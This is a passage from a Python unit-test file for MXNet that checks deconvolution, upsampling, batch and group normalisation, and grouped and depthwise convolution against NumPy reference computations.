    # Weight gradients of the two configurations must agree.
    assert_almost_equal(conv_args_grad[1].asnumpy(), deconv_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
    # Test AddTo
    exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
                                   args_grad=deconv_addto_args_grad,
                                   grad_req="add")
    exe_deconv_addto.forward(is_train=True)
    deconv_out_grad = conv_data[:]
    exe_deconv_addto.backward(deconv_out_grad)
    assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
                        deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
    """Verify Deconvolution output-shape inference.

    When `target_shape` is given, it must override `pad`/`adj` entirely;
    otherwise the spatial output size is inferred from kernel/stride/pad/adj
    and, for the shapes used by this file's callers, is expected to be 8
    along every spatial axis.
    """
    data = mx.sym.Variable(name="data")
    if target_shape:
        deconv = mx.sym.Deconvolution(
            data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
            target_shape = target_shape)
    else:
        deconv = mx.sym.Deconvolution(
            data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
    # Only the inferred output shape matters here.
    _, out_shapes, _ = deconv.infer_shape(data=input_shape)
    default_target_size = 8
    if target_shape is None:
        target_shape = (default_target_size,) * len(kernel)
    # Output layout is (batch, num_filter) + spatial target shape.
    assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
    """Exercise the Deconvolution helpers for 2-D and then 1-D spatial layouts."""
    for d in (2, 1):  # spatial dimensionality: the 2-D cases run first
        def sp(v):
            # Replicate a scalar across the d spatial axes.
            return (v,) * d
        # target_shape overrides pad/adj entirely.
        check_deconvolution_target_shape(
            input_shape = (2, 3) + sp(4),
            kernel = sp(3),
            stride = sp(2),
            target_shape = sp(8),
            pad = sp(99),   # will be ignored
            adj = sp(101),  # will be ignored
        )
        check_deconvolution_target_shape(
            input_shape = (2, 3) + sp(4),
            kernel = sp(3),
            stride = sp(2),
            pad = sp(1),
            adj = sp(1),
        )
        check_deconvolution_forward_backward(
            input_shape = (1, 1) + sp(5),
            num_filter = 1,
            kernel = sp(3),
            stride = sp(1),
            pad = sp(1)
        )
        check_deconvolution_forward_backward(
            input_shape = (32, 3) + sp(28),
            num_filter = 3,
            kernel = sp(3),
            stride = sp(1),
            pad = sp(1)
        )
        check_deconvolution_forward_backward(
            input_shape = (10, 3) + sp(403),
            num_filter = 3,
            kernel = sp(7),
            stride = sp(5),
            pad = sp(2)
        )
        check_deconvolution_gradient(
            input_shape = (1, 3) + sp(5),
            num_filter = 3,
            pad = sp(1)
        )
        check_deconvolution_gradient(
            input_shape = (5, 3) + sp(100),
            num_filter = 3,
            pad = sp(3)
        )
@with_seed()
def test_deconvolution_forward_with_bias():
    """Check if deconvolution forward can work well with bias=True
    """
    def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
        # Smoke test only: bind, randomize arguments, run forward, and pull the
        # result to the host to force execution. No numeric assertion is made.
        x = mx.sym.Variable('x')
        w = mx.sym.Variable('w')
        # NOTE(review): input_data appears unused — the bound arg_arrays are
        # randomized below instead; confirm whether it was meant to be fed in.
        input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
        y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
        exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
        exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
        exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
        exe.forward(is_train=False)
        o = exe.outputs[0]
        t = o.asnumpy()
    # 1-D and 2-D layouts, batch sizes 1 and 32.
    check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
    check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
    check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
    check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
    """Bind nearest-neighbour UpSampling over several inputs and check gradients.

    The forward outputs are fed back as the out-grads, so input k is expected
    to receive gradient arr_k * root_scale**2 * scale**(2*k).
    """
    arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
    arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
    up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
    exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
    exe.forward(is_train=True)
    # Reuse the forward outputs as the out-grads (see docstring).
    exe.backward(exe.outputs)
    for k in range(len(shapes)):
        name = 'arg_%d'%k
        assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
    """Run bilinear UpSampling with a standard bilinear kernel and assert the
    output spatial shape equals the input's scaled by root_scale.

    NOTE(review): `weight_shape` and `scale` are not used in the body — the
    weight shape comes from infer_shape and only the output shape is checked;
    confirm whether a value/gradient comparison was intended.
    """
    def _init_bilinear(arr, f):
        # Fill `arr` with the classic bilinear-interpolation kernel of factor f.
        weight = np.zeros(np.prod(arr.shape), dtype='float32')
        shape = arr.shape
        c = (2 * f - 1 - f % 2) / (2. * f)
        for i in range(np.prod(shape)):
            x = i % shape[3]
            y = (i // shape[3]) % shape[2]
            weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
        arr[:] = weight.reshape(shape)
        return arr
    up = mx.sym.UpSampling(mx.sym.Variable("data"),
                           mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
                           num_filter=num_filter, num_args=2)
    arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
    arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
           'weight':  mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
    arr_grad = [mx.nd.empty(s) for s in arg_shapes]
    exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
    exe.forward(is_train=True)
    out = exe.outputs[0].asnumpy()
    # Backward is run for crash-safety; only the shape is asserted below.
    exe.backward(exe.outputs)
    target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
    assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
    """Sweep nearest-neighbour UpSampling over scales, input counts and sizes."""
    sweep = itertools.product([1, 2, 3], [1, 2, 3], [1, 2, 3], [1, 2, 3])
    for root_scale, scale, num_shape, base in sweep:
        def side(i):
            # Spatial size of input i, shrinking by `scale` per extra input.
            return base * root_scale * scale ** (num_shape - 1 - i)
        shapes = [(1, 3, side(i), side(i)) for i in range(num_shape)]
        check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
    """Sweep bilinear UpSampling configurations (one data + one weight input)."""
    for root_scale, scale, num_filter, base in itertools.product(
            [2, 3], [1, 2, 3], [1, 2, 3], [1, 2, 3]):
        # bilinear upsampling takes only 1 data and 1 weight;
        # the multi-input mode is not applicable here
        side = base * root_scale * scale
        kernel_size = 2 * root_scale - root_scale % 2
        data_shape = (1, num_filter, side, side)
        weight_shape = (1, num_filter, kernel_size, kernel_size)
        check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
    """Numeric-gradient checks for BatchNorm / BatchNorm_v1 in training mode.

    Sweeps fix_gamma and use_global_stats combinations on 2-D and 4-D inputs,
    then sweeps the channel axis (positive and negative) for BatchNorm.
    """
    def check_batchnorm_training(stype):
        for shape in [(2, 3), (2, 3, 2, 2)]:
            data_tmp = np.random.normal(-0.1, 0.1, size=shape)
            # Channel axis is axis 1 by default.
            s = shape[1],
            gamma = np.ones(s)
            beta = np.ones(s)
            gamma[1] = 3
            beta[0] = 3
            rolling_mean = np.random.uniform(size=s)
            rolling_std = np.random.uniform(size=s)
            data = mx.symbol.Variable('data', stype=stype)
            in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
                           mx.nd.array(beta).tostype(stype)]
            mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
            # All four fix_gamma/use_global_stats combinations, for both the
            # legacy BatchNorm_v1 and the current BatchNorm operator.
            test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
            check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
            test = mx.symbol.BatchNorm(data, fix_gamma=True)
            check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
            test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
            check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
            test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
            check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
            test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
            check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
            test = mx.symbol.BatchNorm(data, fix_gamma=False)
            check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
            test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
            check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
            test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
            check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
            # Test varying channel axis
            dim = len(shape)
            for chaxis in range(-dim, dim):
                # Normalize a negative axis to its positive equivalent.
                chaxis_true = chaxis
                if chaxis < 0:
                    chaxis_true = dim + chaxis
                shapex = shape
                channel_count = shapex[chaxis_true]
                data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
                gamma = np.ones(channel_count)
                beta = np.ones(channel_count)
                if channel_count > 1:
                    gamma[1] = 3
                beta[0] = 3
                in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
                               mx.nd.array(beta).tostype(stype)]
                xrolling_mean = np.random.uniform(size=channel_count)
                xrolling_std = np.random.uniform(size=channel_count)
                xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
                             mx.nd.array(xrolling_std).tostype(stype)]
                test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
                check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
                test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
                check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
                test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
                check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
                test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
                check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
    check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
    """Compare BatchNorm / SyncBatchNorm outputs, running stats and all three
    gradients (data, gamma, beta) against hand-derived autograd references,
    across shapes, channel axes and the output_mean_var flag.
    """
    momentum = 0.9
    epsilon = 1e-5
    def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
        print(str((op, shape, axis, cudnn_off)))
        kwargs = dict(output_mean_var=output_mean_var)
        if op == mx.nd.contrib.SyncBatchNorm:
            # SyncBatchNorm supports only axis=1 and has no cudnn_off switch.
            if axis != 1:
                return
            key = str(op) + str(shape) + str(axis)
            kwargs.update(dict(key=key))
            if cudnn_off:
                return
        else:
            kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
        nch = shape[axis]
        bn_gamma = mx.nd.random.uniform(shape=(nch,))
        bn_gamma.attach_grad()
        bn_beta = mx.nd.random.uniform(shape=(nch,))
        bn_beta.attach_grad()
        bn_running_mean = mx.nd.zeros(nch)
        bn_running_var = mx.nd.ones(nch)
        # Reference running statistics, updated in lockstep with the operator's.
        running_mean = mx.nd.zeros(nch)
        running_var = mx.nd.ones(nch)
        num_iters = 10
        # Broadcast shape for per-channel parameters.
        expand_shape = [1] * len(shape)
        expand_shape[axis] = shape[axis]
        for _ in range(num_iters):
            data = mx.nd.random.uniform(shape=shape)
            data.attach_grad()
            ograd = mx.nd.random.uniform(shape=shape)
            with mx.autograd.record():
                output = op(data, bn_gamma, bn_beta,
                            bn_running_mean, bn_running_var,
                            momentum=momentum, eps=epsilon,
                            fix_gamma=False, **kwargs)
                if output_mean_var:
                    output, output_mean, output_std = output
                output.backward(ograd)
            mx.nd.waitall()
            # Reference forward pass: normalize over all axes except `axis`.
            data_mean = data.mean(
                axis=axis, exclude=True, keepdims=True)
            data_var = (data - data_mean).square().mean(axis=axis,
                                                        exclude=True,
                                                        keepdims=True)
            target_output = (data - data_mean) / \
                (data_var + epsilon).sqrt() * \
                bn_gamma.reshape(expand_shape) + \
                bn_beta.reshape(expand_shape)
            # squeeze data_mean and data_var
            data_mean_flat = data_mean.squeeze()
            data_var_flat = data_var.squeeze()
            # Exponential-moving-average update of the running statistics.
            running_mean = running_mean * momentum + \
                data_mean_flat * (1 - momentum)
            running_var = running_var * momentum + \
                data_var_flat * (1 - momentum)
            # Reference backward pass (standard batch-norm gradient derivation).
            W = bn_gamma.reshape(expand_shape)
            dnx = ograd * W
            xsm = data - data_mean
            nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
            nx = xsm * nd
            # m = number of elements normalized per channel.
            m = np.prod(shape) / shape[axis]
            dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
                                   exclude=True) * (-0.5) * mx.nd.power(nd, 3)
            dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
                dvar * xsm.mean(axis=axis, keepdims=True,
                                exclude=True) * 2.0
            dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
            dW = (ograd * nx).sum(axis=axis, exclude=True)
            db = ograd.sum(axis=axis, exclude=True)
            atol = 1e-2
            rtol = 1e-2
            if output_mean_var:
                assert_almost_equal(output_mean.asnumpy(),
                                    data_mean_flat.asnumpy(),
                                    atol=atol, rtol=rtol)
                # BatchNorm reports inverse std; SyncBatchNorm reports variance.
                if op != mx.nd.contrib.SyncBatchNorm:
                    assert_almost_equal(output_std.asnumpy(),
                                        (1.0 / (data_var_flat +
                                                epsilon).sqrt()).asnumpy(),
                                        atol=atol, rtol=rtol)
                else:
                    assert_almost_equal(output_std.asnumpy(),
                                        data_var_flat.asnumpy(),
                                        atol=atol, rtol=rtol)
            assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
                                atol=atol, rtol=rtol)
            assert_almost_equal(bn_running_mean.asnumpy(
            ), running_mean.asnumpy(), atol=atol, rtol=rtol)
            assert_almost_equal(bn_running_var.asnumpy(
            ), running_var.asnumpy(), atol=atol, rtol=rtol)
            assert_almost_equal(data.grad.asnumpy(),
                                dX.asnumpy(), atol=atol, rtol=rtol)
            assert_almost_equal(
                bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
            assert_almost_equal(
                bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
    for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
        for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 5, 6, 4, 4)]:
            for axis in range(len(shape)):
                for cudnn_off in [False, True]:
                    for output_mean_var in [False, True]:
                        _test_batchnorm_impl(op, shape, axis,
                                             cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
    """Check mx.sym.GroupNorm forward and backward against a NumPy
    reference implementation for float16/32/64 inputs on a random
    NCHW-shaped problem.
    """
    # Accumulation dtype used by the NumPy reference for each input dtype,
    # mirroring the operator's higher-precision accumulation.
    acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}

    def x_hat_helper(x, num_groups, eps):
        # Normalize x per (sample, group). Returns the normalized tensor in
        # the grouped (N, G, C//G, H, W) layout plus per-group mean and std.
        dtype = x.dtype
        dshape = x.shape
        assert len(dshape) == 4
        acc_type = acc_types[str(dtype)]
        new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
        new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
        data = x.reshape(new_shape)
        mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
        std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
        x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
        return x_hat, mean, std

    def np_groupnorm(data, gamma, beta, num_groups, eps):
        # Reference forward pass: scale and shift the normalized data, then
        # restore the original 4-D layout.
        new_param_shape = (1, num_groups, 1, 1, 1)
        x_hat, mean, std = x_hat_helper(data, num_groups, eps)
        out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
        # Fix: reshape back using this input's own shape. The original used
        # `dshape` captured from the enclosing test scope, which only worked
        # by accident and would break if the helper were reused elsewhere.
        return out.reshape(data.shape), mean, std

    def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
        # Reference backward pass. Note that mean/std are recomputed from the
        # data via x_hat_helper, so the `mean`, `std` and `beta` arguments do
        # not influence the result (kept for signature compatibility).
        x_hat, mean, std = x_hat_helper(data, num_groups, eps)
        new_shape = x_hat.shape
        dshape = data.shape
        dtype = data.dtype
        new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
        new_param_shape = (1, num_groups, 1, 1, 1)
        acc_type = acc_types[str(dtype)]
        ograd = ograd.reshape(new_shape)
        data = data.reshape(new_shape)
        gamma = gamma.reshape(new_param_shape)
        std = std.reshape(new_moments_shape)
        beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
        gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
        x_hat_grad = ograd * gamma
        ograd_mult = x_hat_grad / std
        red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
        data_grad = ograd_mult - red_out
        red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
        data_grad = data_grad - x_hat * red_out
        return data_grad.reshape(dshape), gamma_grad, beta_grad

    # Random problem size; channel count is always a multiple of the groups.
    batch_size = random.randint(1, 8)
    num_groups = random.randint(2, 3)
    num_channels = random.randint(2, 3) * num_groups
    height = random.randint(1, 5)
    width = random.randint(1, 5)
    dshape = (batch_size, num_channels, height, width)
    param_shape = (num_groups,)
    np_data = np.random.uniform(0.2, 1.0, dshape)
    np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
    np_beta = np.random.uniform(-1.0, 1.0, param_shape)
    data_sym = mx.sym.Variable("data")
    gamma_sym = mx.sym.Variable("gamma")
    beta_sym = mx.sym.Variable("beta")
    for dtype in [np.float16, np.float32, np.float64]:
        # Looser epsilon for half precision keeps the reference stable.
        eps = 1e-2 if dtype == np.float16 else 1e-5
        mx_data = mx.nd.array(np_data, dtype=dtype)
        mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
        mx_beta = mx.nd.array(np_beta, dtype=dtype)
        np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
                                               np_gamma.astype(dtype),
                                               np_beta.astype(dtype),
                                               num_groups=num_groups,
                                               eps=eps)
        mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
                                  num_groups=num_groups, eps=eps, output_mean_var=True)
        check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
                               rtol=1e-2 if dtype == np.float16 else 1e-3,
                               atol=5e-3 if dtype == np.float16 else 1e-5, dtype=dtype)
        mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
                                  num_groups=num_groups, eps=eps, output_mean_var=False)
        np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
        np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
                                                                      np_data.astype(dtype),
                                                                      np_gamma.astype(dtype),
                                                                      np_beta.astype(dtype),
                                                                      np_mean, np_std,
                                                                      num_groups, eps)
        check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
                                [np_data_grad, np_gamma_grad, np_beta_grad],
                                rtol=1e-2 if dtype == np.float16 else 1e-3,
                                atol=5e-2 if dtype == np.float16 else 1e-5, dtype=dtype)
@with_seed()
def test_convolution_grouping():
    """Grouped convolution must equal per-group convolutions computed
    separately on channel slices and concatenated back together.
    """
    num_filter = 4
    for dim, num_group in itertools.product([1, 2, 3], [1, 2]):
        kernel = (3,) * dim
        shape = (1, 4) + (9,) * dim
        x = mx.sym.Variable('x')
        w = mx.sym.Variable('w')
        b = mx.sym.Variable('b')
        grouped = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter,
                                     num_group=num_group, kernel=kernel)
        # Reference: slice channels, convolve each group independently,
        # then concatenate the partial outputs.
        x_parts = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
        w_parts = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
        b_parts = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
        reference = mx.sym.Concat(*[
            mx.sym.Convolution(data=x_parts[i], weight=w_parts[i], bias=b_parts[i],
                               num_filter=num_filter // num_group, kernel=kernel)
            for i in range(num_group)])
        exe_grouped = grouped.simple_bind(default_context(), x=shape)
        exe_reference = reference.simple_bind(default_context(), x=shape,
                                              w=(num_filter, shape[1] // num_group) + kernel,
                                              b=(num_filter,))
        # Give both executors identical random parameters.
        for arg_g, arg_r in zip(exe_grouped.arg_arrays, exe_reference.arg_arrays):
            arg_g[:] = np.float32(np.random.normal(size=arg_g.shape))
            arg_r[:] = arg_g
        exe_grouped.forward(is_train=True)
        exe_grouped.backward(exe_grouped.outputs[0])
        exe_reference.forward(is_train=True)
        exe_reference.backward(exe_reference.outputs[0])
        # Outputs and every input gradient must agree.
        for arr_g, arr_r in zip(exe_grouped.outputs + exe_grouped.grad_arrays,
                                exe_reference.outputs + exe_reference.grad_arrays):
            np.testing.assert_allclose(arr_g.asnumpy(), arr_r.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
    """Depthwise convolution (num_group == num_filter == input channels)
    must match the equivalent stack of single-channel convolutions built
    from SliceChannel + Concat.
    """
    for dim, channels, k, s, p, in_size in itertools.product(
            [1, 2], [1, 4, 16, 32, 64], [3, 5], [1, 2], [0, 1], [7, 32]):
        kernel = (k,) * dim
        stride = (s,) * dim
        pad = (p,) * dim
        num_filter = channels
        num_group = channels
        shape = (2, channels) + (in_size,) * dim
        x = mx.sym.Variable('x')
        w = mx.sym.Variable('w')
        b = mx.sym.Variable('b')
        depthwise = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter,
                                       num_group=num_group, kernel=kernel,
                                       stride=stride, pad=pad)
        # Reference: one single-channel convolution per group, concatenated.
        x_parts = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
        w_parts = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
        b_parts = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
        reference = mx.sym.Concat(*[
            mx.sym.Convolution(data=x_parts[i], weight=w_parts[i], bias=b_parts[i],
                               num_filter=num_filter // num_group, kernel=kernel,
                               stride=stride, pad=pad)
            for i in range(num_group)])
        dev = default_context()
        exe_depthwise = depthwise.simple_bind(dev, x=shape)
        exe_reference = reference.simple_bind(dev, x=shape,
                                              w=(num_filter, shape[1] // num_group) + kernel,
                                              b=(num_filter,))
        # Give both executors identical random parameters.
        for arg_d, arg_r in zip(exe_depthwise.arg_arrays, exe_reference.arg_arrays):
            arg_d[:] = np.random.normal(size=arg_d.shape)
            arg_r[:] = arg_d
        exe_depthwise.forward(is_train=True)
        exe_depthwise.backward(exe_depthwise.outputs[0])
        exe_reference.forward(is_train=True)
        exe_reference.backward(exe_reference.outputs[0])
        # Outputs and every input gradient must agree.
        for arr_d, arr_r in zip(exe_depthwise.outputs + exe_depthwise.grad_arrays,
                                exe_reference.outputs + exe_reference.grad_arrays):
            np.testing.assert_allclose(arr_d.asnumpy(), arr_r.asnumpy(), rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
    """Verify that per-input grad_req settings ('null'/'write'/'add') on
    Convolution yield gradients independent of the other inputs' settings:
    outputs must always match a reference executor, and any input whose
    grad_req equals the reference's must produce the same gradient.
    """
    # NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
    # GPU context will be enabled after figuring out the possible issue tracked at
    # https://github.com/apache/incubator-mxnet/issues/15638.
    ctx = mx.cpu()
    atol = 1.0e-3
    rtol = 1.0e-3
    reqs = ["null", "write", "add"]
    var_names = ["x", "w", "b"]
    dims = [1, 2]
    num_bases = [1, 16, 64]
    kernel_xs = [3, 5]
    stride_xs = [1, 2]
    pad_xs = [0, 1]
    in_sizes = [7, 32]
    no_biases = [True, False]
    for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
            itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
        # Prepare params shape
        kernel = (kernel_x,) * dim
        stride = (stride_x,) * dim
        pad = (pad_x,) * dim
        num_filter = num_base
        x_shape = (2, num_base) + (in_size,) * dim
        w_shape = (num_filter, num_base) + kernel
        # Symbols definition
        x = mx.sym.Variable('x')
        w = mx.sym.Variable('w')
        b = mx.sym.Variable('b') if not no_bias else None
        conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
            kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
        for req_kind in reqs:
            # Binding args for conv with possible dependent gradients:
            # the reference executor uses one uniform grad_req for all inputs.
            base_args = {
                'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
                'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
                'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
            args1 = copy.deepcopy(base_args)
            grad1 = {
                'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
                'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
                'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
            grad_req1 = [req_kind] * 3
            grad_req1 = dict(zip(var_names, grad_req1))
            exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
            exe1.forward(is_train=True)
            exe1.backward(exe1.outputs[0])
            for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
                # Binding args for conv with independent gradients
                args2 = copy.deepcopy(base_args)  # Deepcopy the same params of `exe1`
                grad2 = {
                    'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
                    'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
                    'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
                grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
                exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
                exe2.forward(is_train=True)
                # Identical inputs must give identical outputs no matter
                # which grad_req combination is in effect.
                np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
                    exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
                exe2.backward(exe2.outputs[0])
                for var_name in var_names:
                    if var_name == "b" and no_bias:
                        continue
                    if grad_req2[var_name] == "null":
                        # 'null' means the gradient buffer must remain
                        # untouched, i.e. stay all zeros.
                        exe2_var_grad = grad2[var_name].asnumpy()
                        np.testing.assert_allclose(exe2_var_grad,
                            np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
                    if grad_req2[var_name] != grad_req1[var_name]:
                        continue
                    # Same grad_req as the reference executor: both the
                    # (unmodified) args and the gradients must match.
                    np.testing.assert_allclose(args1[var_name].asnumpy(),
                        args2[var_name].asnumpy(), rtol=rtol, atol=atol)
                    np.testing.assert_allclose(grad1[var_name].asnumpy(),
                        grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
    """Return a pair of random float arrays with broadcast-compatible shapes.

    For idx < 31 the shapes come from a fixed table of hand-picked cases;
    larger indices fall back to randomly generated shape pairs.
    """
    # Hand-picked broadcastable 5-D shape pairs.
    fixed_shape_pairs = [
        ((2, 5, 1, 30, 7), (1, 5, 448, 30, 1)),
        ((10, 49, 1, 77, 17), (10, 1, 2, 1, 17)),
        ((13, 2, 65, 2, 1), (13, 1, 65, 1, 225)),
        ((9, 434, 4, 2, 37), (9, 1, 4, 1, 37)),
